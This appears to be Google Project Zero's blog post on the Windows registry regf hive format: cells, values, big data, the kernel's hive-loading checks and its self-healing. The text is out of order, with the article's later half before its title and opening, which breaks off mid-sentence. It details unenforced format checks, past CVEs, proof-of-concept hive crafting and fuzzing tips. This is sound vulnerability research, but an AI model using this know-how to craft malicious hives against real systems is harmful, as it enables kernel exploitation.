key – a volatile descriptor. It is the only "exception" to the rule that security descriptors are deduplicated and unique within the scope of the hive. If there are two keys with identical security settings but different storage types, they will reference two distinct security descriptor cells via their _CM_KEY_NODE.Security fields, one with the highest bit set and the other with the bit clear. The descriptors stored on both sides are subject to the same rules with regards to reference counting, allocating and freeing. Furthermore, we have previously discussed how all security descriptors in a hive are connected in one global doubly-linked list, but this only applies to the descriptors in the stable space. The functionality is needed so that the descriptors can be enumerated by the kernel when loading a hive from disk, and since volatile descriptors are in-memory only and disappear together with their corresponding keys on hive unload or a system shutdown, there is no need to link them together. The internal CmpInsertSecurityCellList function takes this into account, and points the Flink/Blink fields at themselves, making each volatile descriptor a single-entry list in order to keep it compatible with the list linking/unlinking code. This behavior is illustrated in the diagram below, with two volatile security descriptors each being in their own pseudo-list: This slight quirk is the reason why the ability to create stable keys under volatile ones, which should normally not be possible, may be an exploitable condition with security impact. For details, see the "Creation of stable subkeys under volatile keys" section in the CVE-2023-21748 bug report, or the CVE-2024-26173 bug report.Security descriptors in app hives In normal registry hives, there are no artificial restrictions with regards to security descriptors. There may be an arbitrary number of them, and they may contain any type of settings the user wishes, as long as they have binary control over the hive file and/or the existing security descriptors grant them the access to change them to whatever they want. However, there are some limitations concerning security descriptors in application hives, as documented in the MSDN page of the RegLoadAppKeyA function: All keys inside the hive must have the same security descriptor, otherwise the function will fail. This security descriptor must grant the caller the access specified by the samDesired parameter or the function will fail. You cannot use the RegSetKeySecurity function on any key inside the hive. The intent behind the quote seems to be that the security settings within an app hive should be uniform and immutable; that is, remain identical to their initial state at hive creation, and consistent across all keys. There is indeed some truth to the documentation, as trying to change the security of a key within an app hive with RegSetKeySecurity, or to create a new key with a custom descriptor both result in a failure with STATUS_ACCESS_DENIED. However, the part about all keys having the same security descriptor is not actually enforced, and a user can freely load an app hive with any number of different security descriptors associated with the keys. This was reported to Microsoft as WinRegLowSeverityBugs issue #20, but wasn't deemed severe enough to be addressed in a security bulletin (which I agree with), so for now, it remains an interesting discrepancy between the documentation and implementation.Key values and value lists While keys allow software to create a data organization hierarchy, values are the means of actually storing the data. Each value is associated with one specific key, and is characterized by the following properties:NameTypeData In general, values are much simpler than keys. To begin with, they are not a full-fledged object in the NT Object Manager sense: you cannot open a handle to a value, and thus you may only access them through the handle of its associated key and its name. They also don't have dedicated security descriptors, so a client with a key handle with the KEY_QUERY_VALUE access can enumerate and read all values of the key, and the KEY_SET_VALUE rights allows the caller to create/modify/delete all values within a key. For these reasons, values are best thought of as elaborate attributes of a key, not as an independent entity. There is no fixed limit on the number of values associated with a key other than the available hive space, which places the number at around 67 million (0x80000000 ÷ 0x20, the hive space divided by the minimum value cell size). The value list format is also not as optimized as the subkey index is: it is a linear, single-level list with just the raw value cell indexes, without any additional metadata like a header or hints. The list is not sorted either, and their order is defined by when they were added to the key. Finally, value name uniqueness is guaranteed on output, but not enforced on input: it is possible to load a specially crafted hive with several values with the same name, and contrary to duplicate keys, this doesn't seem to pose any fundamental problems for the registry implementation. A high-level overview of the hive cells related to a key's value list is shown below: In the next section, we will examine the internal layout and semantics of the _CM_KEY_VALUE structure, which describes each unique value in the registry.The key value cell As usual, we can print out the structure definition in WinDbg: 0: kd> dt _CM_KEY_VALUE nt!_CM_KEY_VALUE    +0x000 Signature        : Uint2B    +0x002 NameLength       : Uint2B    +0x004 DataLength       : Uint4B    +0x008 Data             : Uint4B    +0x00c Type             : Uint4B    +0x010 Flags            : Uint2B    +0x012 Spare            : Uint2B    +0x014 Name             : [1] Wchar Let's examine each field more closely.Signature It identifies the cell as a key value, and must be equal to 0x6B76 ('vk'). It is verified during hive load, but isn't used for anything else later on.NameLength and Name The combination of these two fields specifies the name of the value: NameLength indicates the length of the string in bytes, and Name is an inline, variable-length buffer that stores the name itself. Let's consider the same criteria of the name that we have previously discussed in the context of registry keys: Compression: Similarly to keys, value names may be compressed if the VALUE_COMP_NAME (0x1) flag is set in _CM_KEY_VALUE.Flags. In that case, the string is stored as 8-bit ASCII characters, otherwise the normal wide-character encoding is used.Length: The length of the name can be between 0 and 16,383 characters. A length of zero indicates an alias for the value displayed by Regedit as "(Default)", a remnant of the design from Windows 3.1 where data was assigned directly to keys. As a sidenote, the correct enforcement of the upper limit was only introduced in October 2022 as a fix for CVE-2022-37991.Charset: All characters in the 0x0000 – 0xFFFF range are allowed in a value name, with no exceptions. Since values are not part of the same namespace as keys, this even includes backslashes. The only constraint is that if the corresponding key is a symbolic link, then the value must be named "SymbolicLinkValue", as it has a special meaning and stores the link's target path. An example of a bug related to sanitizing value names was CVE-2024-26176.Uniqueness: Value name uniqueness is not enforced on input, but it is maintained by the kernel at runtime on a best-effort basis. That means that whenever setting a value, the system will always try to reuse an existing one with the same name before creating a new one. Similarly to keys, value lookup is performed in a case-insensitive manner, but the original casing is preserved and visible to the clients.DataLength Specifies the length of the data stored in the value. The various ranges of the 32-bit space that the field can fall into are explained below: DataLength Hive versions < 1.4 Hive versions ≥ 1.4 0x0 Empty value, `Data` must be set to HCELL_NIL. 0x1 – 0x3FD8 Data stored directly in a backing cell pointed to by `Data`. 0x3FD9 – 0xFFFFC Data stored directly in a backing cell pointed to by `Data`. Data split into 16344-byte chunks and saved in a big data object pointed to by `Data`. 0xFFFFD – 0x3FD7C028 Invalid. 0x3FD7C029 – 0x7FFFF000 Not accepted on input due to a 16-bit integer overflow in the big data chunk count. Feasible to set at runtime, but the saved data will be truncated due to the same bug / design limitation. 0x7FFFF001 – 0x7FFFFFFF Invalid 0x80000000 – 0x80000004 Between 0–4 bytes stored inline in the `Data` field. 0x80000005 – 0xFFFFFFFF Invalid.Data Responsible for storing or pointing to the data associated with the value. To summarize the table above, it can be in one or four states, depending on the data length and hive version: Empty – equal to HCELL_NIL, if DataLength is 0.Inline – stores up to four bytes in the Data member of the value cell itself, as indicated by DataLength & 0x7FFFFFFF, if the highest bit of DataLength is set. As a side effect, an empty value can be represented in two ways: either as DataLength=0 or DataLength=0x80000000.Raw data – points to a raw backing cell if Hive.Version < 1.4 or DataLength ≤ 0x3FD8.Big data – points to a big data structure introduced in hive version 1.4, which is capable of storing 0xFFFF × 0x3FD8 = 0x3FD7C028 bytes (a little under 1 GiB). More on big data cells in the section below.Type This field is supposed to store one of the supported value types, such as REG_DWORD, REG_BINARY, etc. We'll omit a thorough discussion of the official types, as we feel they are already well documented and understood. From a strictly technical point of view, though, it's important to note that the type is simply a hint, an extra piece of metadata that is available to a registry client with the intended purpose of indicating the nature of the value. However, Windows provides no guarantees with regards to the consistency between the value type and its data. For instance, a REG_DWORD value doesn't have to be four-bytes long (even though it conventionally is), a REG_SZ unicode string can have an odd length, and so on. Any client application that operates on user-controlled data from the registry should always check the specific properties it relies on, instead of unconditionally trusting the value type. Beyond this flexibility in data interpretation, there's another aspect of the Type field to consider: its potential for misuse due to its 32-bit width. The kernel generally doesn't perform any verification that its numerical value is one of the small, predefined enums (other than to ensure REG_LINK for symbolic links and REG_NONE for tombstone values), so it is possible to set it to any arbitrary 32-bit value, and have it returned in exactly the same form by system APIs such as RegQueryValueEx. If a program or driver happens to use the value type returned by the system as a direct index into an array without any prior bounds checking, this could lead to out-of-bounds reads or memory corruption. In some sense, it would probably be safest for the most critical/privileged software in the system (e.g. antivirus engines) not to use the value type at all, or only within a very limited scope.Flags There are currently two supported flags that can be set on registry values:VALUE_COMP_NAME (0x1) – equivalent to KEY_COMP_NAME, indicates that the value name representation is a tightly packed string of ASCII characters.VALUE_TOMBSTONE (0x2) – used exclusively in differencing hives (version 1.6) to indicate that a value with the given name has been explicitly deleted and doesn't exist on this key layer. It requires that the value type is REG_NONE and it doesn't contain any data. It is equivalent to the Tombstone (1) property of a key set in the LayerSemantics field of a key node.Spare Unused member, never accessed by the kernel.Big data value storage Prior to hive version 1.4, the maximum length of a value in the registry was 1 MB, which was directly related to the maximum length of the single backing cell that would store the raw data. This limitation is documented in the Registry element size limits article: Registry element Size limit ValueAvailable memory (latest format) [editor's note: this is not fully accurate]1 MB (standard format) Here, "standard format" refers to regf v1.3. On some level, 1 MB could be considered a reasonable limit, as the registry was not designed to serve as storage for large quantities of data – at least not initially. One example of a public resource which vocalized this design decision was the old Windows registry information for advanced users article from around 2002-2003, which stated: Long values (more than 2,048 bytes) must be stored as files with the file names stored in the registry. Nevertheless, it seems that at some point during the development of Windows XP, Microsoft decided to provide the registry clients with the ability to store larger chunks of data, not bound by the somewhat arbitrary limits of the regf format. In order to facilitate this use case, a new cell type was added, called the "big data". Conceptually, it is simply a means of dividing one long data blob into smaller portions of 16344 bytes, each stored in a separate cell. It replaces the single backing cell with a _CM_BIG_DATA structure defined as follows: 0: kd> dt _CM_BIG_DATA nt!_CM_BIG_DATA    +0x000 Signature        : Uint2B    +0x002 Count            : Uint2B    +0x004 List             : Uint4B The signature is set to 0x6264 ('db') and verified on hive load, but otherwise not used. The count represents the number of 16344-byte chunks making up the overall value, and is generally supposed to be set to an integer between 2–65535. Otherwise, if it was set to 0, that would mean that the value is empty so the big data object shouldn't be present at all. If it was equal to 1, a direct backing buffer should have been used instead, so such a construct would also be invalid. Neither zero nor one are thus accepted by the hive loader, but it is technically possible to set these values at runtime by abusing the aforementioned integer overflow bug. We haven't found any security impact of this behavior other than it being a correctness error, though. The last element of the structure, List, is a cell index to a basic array of cell indexes making up the value chunks. Its format is equivalent to that of the value list, which also stores just the HCELL_INDEX values without any headers or additional information. Furthermore, every chunk other than the last one must contain exactly 16344 bytes. If the length of the overall value is not divisible by 16344, the final chunk contains the remaining 1–16343 bytes. The layout of the big data object and its associated cells is shown in the diagram below: This concludes the part about the internal format of registry hives.The hive loading and sanitization process The hive loading process implemented by the NtLoadKey* family of system calls is a long and complex operation. It involves opening the hive file, loading it in memory, verifying its integrity, optionally recovering state from transactional log files, allocating any related kernel objects, attaching the hive to the global registry tree, and optionally opening a handle to the hive root and returning it to the caller. In this blog post, we are particularly interested in the hive sanitization part. Understanding this portion of the registry code is like consulting the official specification – or even better, as the code doesn't lie and is essentially the ground truth of what is and isn't accepted as valid data. Furthermore, it provides us with a number of hints as to which properties of the format are imperative to the correct functioning of the database, and which ones are more conventional, and don't have any serious consequences even if broken. The goal of this section is to discuss the overall control flow of loading a hive and performing the initial pass of sanitization. By documenting which internal routines are responsible for which checks, we hope to make it easier for other security researchers to navigate the hive loading code, providing a good starting point for their own investigations. The registry, as a logical structure, is built on top of several lower-layer abstractions, each of which has a number of invariants that must hold in order for the hive to be considered valid, and in order for operations being performed on the hive to be safe. This is illustrated in the pyramid below, with the most foundational requirements placed at the bottom, and the increasingly more general aspects of hive integrity towards the top: Let's consider some examples of validity checks at each level, starting with the most fundamental ones: Hive header, bin and cell layout consistency Validity of the hive version, length, root cell index, flags in the header. Existence of at least one bin in the hive. Validity of each bin's header, particularly the file offset and size. Validity of cells: aligned to eight bytes, within the bounds of the bin, completely filling out the bin. Intra-cell consistency Sufficient size of each cell with regards to the data it stores: at least the minimum size for the cell type (e.g. 0x4e for the key node), plus adequate to any variable-length internal arrays, such as the key name or value name. Correct signatures being set for every kind of cell depending on its function. Valid combinations of flags being set in key nodes and values. Strings (key names, value names) adhering to the format requirements regarding minimum and maximum lengths, charset, etc. Inter-cell consistency Valid references to cells in cell indexes, and each allocated cell only being used for one specific purpose. Consistency between copies of redundant data in separate cells: e.g. _CM_KEY_NODE.SubKeyCounts[...] vs. the length of the subkey index. Consistency between length markers in one cell vs. the amount of data stored in the corresponding backing buffer (e.g. _CM_KEY_VALUE.DataLength vs. length of the data stored in the raw data cell / big data cell). Correct hints in subkey indexes (fast leaves, hash leaves). Correct reference counts in the security descriptors. Structural correctness of high-level constructs Consistency of the linked list of security descriptors. Subkeys being laid out in a lexicographical order in all subkey indexes. Symbolic link keys having a single value named "SymbolicLinkValue" of type REG_LINK. Subkeys in the stable space always having a non-volatile parent. Correctness of global hive properties Each hive always containing at least one key (the root key) and at least one security descriptor. Only the root of the hive, and no other key having the KEY_HIVE_ENTRY flag set. The depth of the hive's tree structure being a maximum of 512 levels. As we can see, there are a variety of constraints that require verification when loading a hive, with the more abstract ones relying on the lower-layer ones to be confirmed first. It explains why the process is by far the most complex operation one can perform on the registry, spanning across thousands of lines of code and dozens of functions. To better illustrate this process, I've outlined the most important hive validation functions below, indented to show their hierarchical relationships as they execute in the kernel: NtLoadKey* → CmLoadDifferencingKey → CmLoad(App)Key CmpCmdHiveOpen → CmpInitHiveFromFile → CmpCreateHive HvHiveStartFileBacked → HvLoadHive HvpGetHiveHeader HvAnalyzeLogFiles HvpPerformLogFileRecovery HvpRemapAndEnlistHiveBins HvpValidateLoadedBin HvpEnlistFreeCells CmCheckRegistry HvCheckHive HvCheckBin CmpValidateHiveSecurityDescriptors CmpCheckRegistry2 CmpCheckKey CmpCheckValueList CmpCheckLeaf CmpCheckLexicographicalOrder CmpCheckAndFixSecurityCellsRefcount CmpLoadKeyCommon CmpLinkHiveToMaster ObOpenObjectByName → ... ... → CmpParseKey → CmpDoParseKey CmpUpdateHiveRootCellFlags Here is a short summary of each of the above functions, according to my own analysis and understanding: Function name(s) Description NtLoadKey* The four syscall entry points for loading registry hives, as discussed in the previous post: NtLoadKey, NtLoadKey2, NtLoadKeyEx, NtLoadKey3. CmLoadDifferencingKey A generic function for loading hives – not just differencing ones but every kind, contrary to what the name might suggest. Other than the syscall handlers, it is also called by VrpPreLoadKey and VrpLoadDifferencingHive, which are parts of the VRegDriver. It is responsible for sanitizing the input flags, checking the privileges of the caller, calling registry callbacks, invoking specialized functions to actually load the hive, and opening a handle to the root of the hive if the caller requested it. CmLoadKey,CmLoadAppKey Functions implementing the core functionality of loading normal and app hives, respectively. They are responsible for coordinating lower-layer loading functions, resolving any conflicts related to the hive file / registry mount path, and inserting the hive-related objects into the corresponding kernel data structures. In terms of opening and validating the binary hive representation, they are virtually equivalent. CmpCmdHiveOpen,CmpInitHiveFromFile,CmpCreateHive Functions dedicated to opening the hive file on disk, loading it in memory, validating its integrity and allocating the internal kernel structures (_CMHIVE and other objects representing the hive). HvHiveStartFileBacked,HvLoadHive Common functions for loading and sanitizing the hive on the level of header, bins and cells (the lowest level of the pyramid). HvpGetHiveHeader Reads and validates the hive header, trying to determine if it is valid or corrupted, and whether the header or hive data need to be recovered from a log file. HvAnalyzeLogFiles,HvpPerformLogFileRecovery Two most important functions related to data recovery from log files: the first one determines which of the two files (.LOG1/LOG2) to use, and the second one actually applies the log file entries to the hive mapping in memory. HvpRemapAndEnlistHiveBins,HvpValidateLoadedBin,HvpEnlistFreeCells Functions responsible for re-mapping the hive after log file recovery, in order to ensure that every bin is mapped as a continuous block of memory. During the process, the validity of all bins and the layout of their cells is verified. CmCheckRegistry A generic function encompassing the verification of levels ≥ 2 of the pyramid, i.e. everything about the hive that defines its logical structure and is not related to memory management. If any self-healing occurs during the process, the function restarts its logic, so it may potentially take multiple iterations before a corrupted hive is fixed up and accepted as valid. HvCheckHive,HvCheckBin Two functions responsible for validating the bin headers and layout of their cells. As you may have noticed, this part of their functionality is redundant with HvpValidateLoadedBin and HvpEnlistFreeCells. The difference is that the earlier functions are used to cache information about the positions of free cells in the hive, to optimize the allocation process later on. On the other hand, the underlying purpose of HvCheckHive and HvCheckBin is to generate a bitmap object (RTL_BITMAP) that indicates the positions of allocated cells, in order to ensure the validity of cell indexes when sanitizing the hive, and to make sure that every cell is only used for a single purpose in the hive. As a side note, there is an amusing bug in HvCheckBin related to verifying cell size correctness, but it seems to be non-exploitable precisely because the same sanitization is correctly performed earlier in HvpEnlistFreeCells. CmpValidateHiveSecurityDescriptors The function traverses the linked list of security descriptor cells, and verifies its consistency (the correctness of the Flink/Blink indexes) and the validity of the security descriptor blobs. At the same time, it also caches information about the descriptors in internal kernel structures, so that they can be quickly looked up when verifying the _CM_KEY_NODE.Security fields, and later at system run time. CmpCheckRegistry2 A function responsible for performing a single attempt at validating the entire key structure. There are several possible return codes:STATUS_SUCCESS if the hive validation passes without problems,STATUS_REGISTRY_HIVE_RECOVERED if minor corruption was encountered, but it was successfully fixed in-place,STATUS_RETRY if a badly corrupted key was encountered and removed from its parent's subkey index. This causes CmCheckRegistry to restart the validation process from scratch.STATUS_REGISTRY_CORRUPT if the hive was found to be corrupted beyond repair.Other problem-specific error codes such as STATUS_NO_LOG_SPACE or STATUS_INSUFFICIENT_RESOURCES, which cause the loading process to be aborted. CmpCheckKey This is the central function in the hive sanitization process, with more than a thousand lines of code in decompiled output, and likely just as many in the original source code. It essentially checks the validity of all fields within a specific key node, and also orchestrates the validation of the value list and subkey index associated with the key. If there was one function I would recommend analyzing to better understand the regf format, it would be this one. CmpCheckValueList Checks the consistency of a value list, each of the value cells on the list, and their backing buffers / big data objects. CmpCheckLeaf Validates a specific leaf subkey index, i.e. one of 'li', 'lf', 'lh'. This includes checking the cell size, signature, validity of the subkey cell indexes and their hint values. CmpCheckLexicographicalOrder Compares the name of two consecutive subkeys to determine if the second one is lexicographically greater than the first, in order to ensure the right sorting of a subkey index. CmpCheckAndFixSecurityCellsRefcount Iterates over all security descriptors in the hive, compares their refcounts loaded from disk with the values independently re-calculated while sanitizing the key tree, and corrects them if they are unequal. Since November 2024, it also frees any unused security descriptors with the reference count set to zero (they had been previously allowed, as described in WinRegLowSeverityBugs issue #10). CmpUpdateHiveRootCellFlags The function makes sure that the root key of the hive has the KEY_NO_DELETE and KEY_HIVE_ENTRY flags set. Interestingly, these flags are the only aspect of the regf format that is not enforced directly while loading the hive (in CmpCheckKey), but only at a later stage when the hive is being mounted in the global registry view.Self-healing properties The Windows implementation of the registry has the unique property that it is self-healing: the system tries very hard to successfully load a hive even if it's partially corrupted. My guess is that the reason for this design was to make the mechanism resilient against random data corruption on disk, as failure to load a system hive early during start-up would make Windows unusable. Perhaps it was decided that it was a better tradeoff to forcefully remove the broken parts of the file, with the hope that they would be automatically re-created later at run time, or that they weren't very important to begin with and the system/applications could continue to function correctly without them. And even if not, giving the user a chance to troubleshoot the problem or recover their data would still be a better outcome than bricking the machine completely. Consequently, whenever an error is detected by the hive loading logic, it is handled in one of several ways, depending on the nature of the problem: Bin recreation: if HvpValidateLoadedBin indicates that any part of a bin header is corrupted, then HvpRemapAndEnlistHiveBins re-initializes it from scratch, and declares it as 4096 bytes long (regardless of the previous length).Cell recreation: if HvpEnlistFreeCells detects a cell with an invalid length, it converts it to a single free cell spanning from the current offset until the end of the bin, potentially erasing any other data/cells previously residing in that region.Small, direct fix: if a single field within a key node is found to have an invalid state, and the good/expected state is known to the kernel, the problem gets fixed by directly overwriting the old value with the correct one. Examples include cell signatures and mandatory/illegal flags.Single value deletion: if any inconsistencies are found in a value cell or its associated data cell(s), the specific value is removed from the key's value list.Deletion of entire value list: if the descriptor of a value list (i.e. its cell index or length) are invalid, or if a symbolic link contains more than one value, the entire value list of the key is cleared.Single key deletion: if an irrecoverable problem is found within a key node (e.g. invalid cell index, invalid cell length, invalid name), then it is removed from its parent's subkey index, and the key tree validation process is restarted from scratch.Deletion of entire subkey index: if any irrecoverable problem is found in a subkey index, it is deleted, and the subkey list of its associated key is cleared.Security descriptor list reset: if any errors are detected in the list of security descriptors (bad Flink/Blink indexes or invalid binary format), the set of descriptors in the hive is reduced to the single root descriptor, which will then be inherited by all the keys in the hive.Rejection of entire hive: if any issues are found with the fundamental parts of the regf format or its properties (heavily corrupted header, missing bins, invalid root key, invalid root security descriptor), the loading of the hive is completely aborted. As we can see, Windows implements a very defensive strategy and always attempts to either fix the corrupted data, or isolate the damage by deleting the affected object while preserving the overall hive integrity. Only when these repair attempts are exhausted does the kernel abort the loading process and return an error. This resilience can lead to situations where a freshly loaded hive is already in a "dirty" state, requiring the system to immediately flush its self-applied corrections to disk to maintain consistency. One particularly interesting bug related to the self-healing process was CVE-2023-38139. To reproduce the issue, the self-healing logic would have to be triggered a large number of times (in the case of my PoC, 65535 times) in order to cause a 32-bit integer overflow of a security descriptor refcount, and later a UAF condition. I have also abused the behavior to demonstrate WinRegLowSeverityBugs #13, in which a key with an empty name would be removed during load, freeing up a reference to a security descriptor and resulting in the refcount being equal to zero upon loading. Overall, the self-healing property of the registry is not the most critical, but one that I find quite fascinating and certainly worth keeping in mind as part of one's toolbox when researching this subsystem.Conclusion Congratulations on reaching the end! This post aimed to systematically explore the inner workings of the regf format, focusing on the hard requirements enforced by Windows. Due to my role and interests, I looked at the format from a strictly security-oriented angle rather than digital forensics, which is the context in which registry hives are typically considered. Hopefully, this deep dive clarifies some of the intricacies of the hive format and complements existing unofficial documentation. Keep in mind that hives store their data in the regf files on disk, but Windows also creates multiple auxiliary kernel objects for managing and caching this data once loaded. The next post in the series will discuss these various objects, their relationships, lifecycle, and, naturally, their impact on system security. Stay tuned!

https://googleprojectzero.blogspot.com/2024/12/the-windows-registry-adventure-5-regf.html
The Windows Registry Adventure #5: The regf file format
2024-12-19T19:03:00Z | 1734634980

Posted by Mateusz Jurczyk, Google Project Zero As previously mentioned in the second installment of the blog post series ("A brief history of the feature"), the binary format used to encode registry hives from Windows NT 3.1 up to the modern Windows 11 is called regf. In a way, it is quite special, because it represents a registry subtree simultaneously on disk and in memory, as opposed to most other common file formats. Documents, images, videos, etc. are generally designed to store data efficiently on disk, and they are subsequently parsed to and from different in-memory representations whenever they are read or written. This seems only natural, as offline storage and RAM come with different constraints and requirements. On disk, it is important that the data is packed as tightly as possible, while in memory, easy and efficient random access is typically prioritized. The regf format aims to bypass the reparsing step – likely to optimize the memory/disk synchronization process – and reconcile the two types of data encodings into a single one that is both relatively compact and easy to operate on at the same time. This explains, for instance, why hives don't natively support compression (but the clients are of course free to store compressed data in the registry). This unique approach comes with its own set of challenges, and has been a contributing factor in a number of historical vulnerabilities. Throughout the 30 years of the format's existence, Microsoft has never released its official specification. However, the data layout of all of the building blocks making up a hive (file header, bin headers, cell structures) are effectively public through the PDB symbols for the Windows kernel image (ntoskrnl.exe) available on the Microsoft Symbol Server. Furthermore, the Windows Internals book series also includes a section that delves into the specifics of the regf format (named Hive structure). Lastly, forensics experts have long expressed interest in the format for analysis purposes, resulting in the creation of several unofficial specifications based on reverse engineering, experimentation and deduction. These sources have been listed in my earlier Learning resources blog post; the two most extensive specifications of this kind can be found here and here. The intent of this post is not to repeat the information compiled in the existing resources, but rather to highlight specific parts of the format that have major relevance to security, or provide some extra context where I found it missing. A deep understanding of the low-level regf format will prove invaluable in grasping many of the higher-level concepts in the registry, as well as the technical details of software bugs discussed in future blog posts.The hive structure: header, bins and cells On the lowest level, data in hives is organized in chunks of 4 KiB (0x1000 bytes), incidentally the size of a standard memory page in the x86 architecture. The first 4 KiB always correspond to the header (also called the base block), followed by one or more bins, each being a multiple of 4 KiB in length. The header specifies general information about the hive (signature, version, etc.), while bins are an abstraction layer designed to enable the fragmentation of hive mappings in virtual memory – more on that later. Each bin starts with a 32-byte (0x20) header, followed by one or more cells that completely fill the bin. A cell is the smallest unit of data in a hive that has a specific purpose (e.g. describes a key, value, security descriptor, and so on). The data of a cell is preceded by a 32-bit integer specifying its size, which must be a multiple of eight (i.e. its three least significant bits are clear), and is either in the free or allocated state. A free (unused) cell is indicated by a positive size, and an allocated cell is indicated by a negative one. For example, a free cell of 32 bytes has a length marker of 0x00000020, while an active cell of 128 bytes has its size encoded as 0xFFFFFF80. This visibly demonstrates the hybrid on-disk / in-memory nature of the hive format as opposed to other classic formats, which don't intentionally leave large chunks of unused space in the files. The overall file structure is illustrated in the diagram below: In the Windows kernel, internal functions responsible for handling these low-level hive objects (base block, bins, cells) have names starting with "Hv", for example HvCheckHive, HvpAllocateBin or HvpViewMapCleanup. This part of the registry codebase is crucial as it forms the foundation of the registry logic, enabling the Configuration Manager to easily allocate, free, and access hive cells without concerning itself with the technical details of memory management. It is also a place with significant potential for optimizations, such as the incremental logging added in Windows 8.1, or section-based registry introduced in Windows 10 April 2018 Update (RS4). Both of these mechanisms are well described in the Windows Internals 7 (Part 2) book. While integral to the correct functioning of the registry, hive management does not constitute a very large part of the overall registry-related codebase. In my analysis of the registry code growth shown in blog post #2, I counted 100,007 decompiled lines of code corresponding to this subsystem in Windows 11 kernel build 10.0.22621.2134. Out of these, only 10,407 or around 10.4% correspond to hive memory management. This is also reflected in my findings: out of the 52 CVEs assigned by Microsoft, only two of them were directly related to a Hv* function implementation – CVE-2022-37988, a logic bug in HvReallocateCell leading to memory corruption, and CVE-2024-43452, a double-fetch while loading hives from remote network shares. This is not to say that there aren't more bugs in this mechanism, but their quantity is likely proportional to its size relative to the rest of the registry-related code. Let's now have a closer look at how each of the basic objects in the hive are encoded and what information they store, starting with the base block.Base block The base block is represented by a structure called _HBASE_BLOCK in the Windows Kernel, and its layout can be displayed in WinDbg: 0: kd> dt _HBASE_BLOCK nt!_HBASE_BLOCK    +0x000 Signature        : Uint4B    +0x004 Sequence1        : Uint4B    +0x008 Sequence2        : Uint4B    +0x00c TimeStamp        : _LARGE_INTEGER    +0x014 Major            : Uint4B    +0x018 Minor            : Uint4B    +0x01c Type             : Uint4B    +0x020 Format           : Uint4B    +0x024 RootCell         : Uint4B    +0x028 Length           : Uint4B    +0x02c Cluster          : Uint4B    +0x030 FileName         : [64] UChar    +0x070 RmId             : _GUID    +0x080 LogId            : _GUID    +0x090 Flags            : Uint4B    +0x094 TmId             : _GUID    +0x0a4 GuidSignature    : Uint4B    +0x0a8 LastReorganizeTime : Uint8B    +0x0b0 Reserved1        : [83] Uint4B    +0x1fc CheckSum         : Uint4B    +0x200 Reserved2        : [882] Uint4B    +0xfc8 ThawTmId         : _GUID    +0xfd8 ThawRmId         : _GUID    +0xfe8 ThawLogId        : _GUID    +0xff8 BootType         : Uint4B    +0xffc BootRecover      : Uint4B The first thing that stands out is the fact that even though the base block is 4096-bytes long, it only really stores around 236 bytes of meaningful data, and the rest (the Reserved1 and Reserved2 arrays) are filled with zeros. For a detailed description of each field, I encourage you to refer to the two unofficial regf specifications mentioned earlier. In the sections below, I share additional thoughts on the usage and relevance of some of the most interesting header members.Sequence1, Sequence2 These 32-bit numbers are updated by the kernel during registry write operations to keep track of the consistency state of the hive. If the two values are equal during loading, the hive is in a "clean" state and doesn't require any kind of recovery. If they differ, this indicates that not all pending changes have been fully committed to the primary hive file, and additional modifications must be applied based on the accompanying .LOG/.LOG1/.LOG2 files. From a security point of view, manually controlling these fields may be useful in ensuring that the log recovery logic (HvAnalyzeLogFiles, HvpPerformLogFileRecovery and related functions) gets executed by the kernel. This is what I did when crafting the proof-of-concept files for CVE-2023-35386 and CVE-2023-38154.Major, Minor These are some of the most consequential fields in the header: they represent the major and minor version of the hive. The only valid major version is 1, while the minor version has been historically an integer between 0 and 6. Here is an overview of the different 1.x versions in existence: Version Year Introduced in New features 1.0 1992 Windows NT 3.1 Pre-Release Initial format 1.1 1993 Windows NT 3.1 1.2 1994 Windows NT 3.5 Predefined keys 1.3 1995 Windows NT 4.0 Fast leaves 1.4 2000 Windows Whistler Beta 1 Big value support 1.5 2001 Windows XP Hash leaves 1.6 2016 Windows 10 Anniversary Update Layered keys The later versions draw extensively on the earlier ones both conceptually and in terms of the actual implementation – there are non-trivial portions of code in Windows NT 3.1 Beta that are used to this day in the latest Windows 11. But when it comes to pure binary compatibility, versions 1.0 to 1.2 differ too much from the newer ones and have long been considered obsolete. This leaves us with versions ≥ 1.3, which are all cross-compatible and can be used freely on the current systems. Within this group, version 1.4 was an intermediate step in the development of the format, observed only in beta releases of Windows XP (codenamed Whistler). The other three are all in active use, and can be found in a default installation of Windows 10 and 11: 1.3: encodes volatile hives (the root hive, HKLM\HARDWARE), the BCD hive (HKLM\BCD00000000), the user classes hives (HKU\_Classes), and some application hives (backed by settings.dat).1.5: encodes a majority of the system hives in HKLM (SYSTEM, SOFTWARE, SECURITY, SAM, DRIVERS), all user hives (HKU\), and most application hives (backed by ActivationStore.dat).1.6: encodes all differencing hives, i.e. hives used by processes running inside Application and Server Silos, mounted under \Registry\WC. It is worth noting that the hive version is supposed to be indicative of the features used inside; for example, only hives with versions ≥1.4 should use big values (values longer than 1 MiB), only hives with versions ≥1.5 should use hash leaves, etc. However, this is not actually enforced when loading a hive, and newer features being used in older hives will work completely fine. This behavior may become a problem if any part of the registry code makes any assumptions about the structure of the hive based solely on its version. One example of such a vulnerability was CVE-2022-38037, caused by the fact that the CmpSplitLeaf kernel function determined the format of a subkey list based on the hive version and not the binary representation of the list itself. In general, when writing a registry-specific fuzzer, it might be a good idea to flip the minor version between 3-6 to increase the chances of hitting some interesting corner cases related to version handling. As a last note, the version number is internally converted to a single 32-bit integer stored in the _HHIVE.Version structure member using the following formula: Minor+(Major*0x1000)-0x1000. In the typical case where the major version is 1, the last two components cancel each other out, e.g. version 1.5 becomes simply "5". This would be fine, if not for the fact that a major version of 0 is also allowed by HvpGetHiveHeader, in which case the minor version can be any value greater or equal to 3. Furthermore, if the kernel enters the header recovery path (because the hive header is corrupted and needs to be recovered from a .LOG file), then one can set the major/minor fields to completely arbitrary values and they will be accepted, as HvAnalyzeLogFiles doesn't perform the same strict checks that HvpGetHiveHeader does. Consequently, it becomes possible to spoof the version saved in _HHIVE.Version and have it take virtually any value in the 32-bit range, but I haven't found any security implications of this behavior, and I'm sharing it simply as a curiosity.RootCell This is the cell index (offset in the hive file) of the root key, which marks a starting point for the Configuration Manager to parse the hive tree. The root cell is special in many respects: it is the only one in a hive that doesn't have a parent, it cannot be deleted or renamed, its name is unused (it is instead referenced by the name of its mount point), and its security descriptor is treated as the head of the security descriptor linked list. While the RootCell member itself has not been directly involved in any bugs I am aware of, it is worth keeping its special properties in mind when doing registry security research.Length Specifies the cumulative size of all bins in the hive, i.e. its file size minus 4096 (the size of the header). It is limited to 0x7FFFE000, which reflects the ~2 GiB capacity of the hive stable storage (the part of the hive that resides on disk). Combined with another ~2 GiB of volatile space 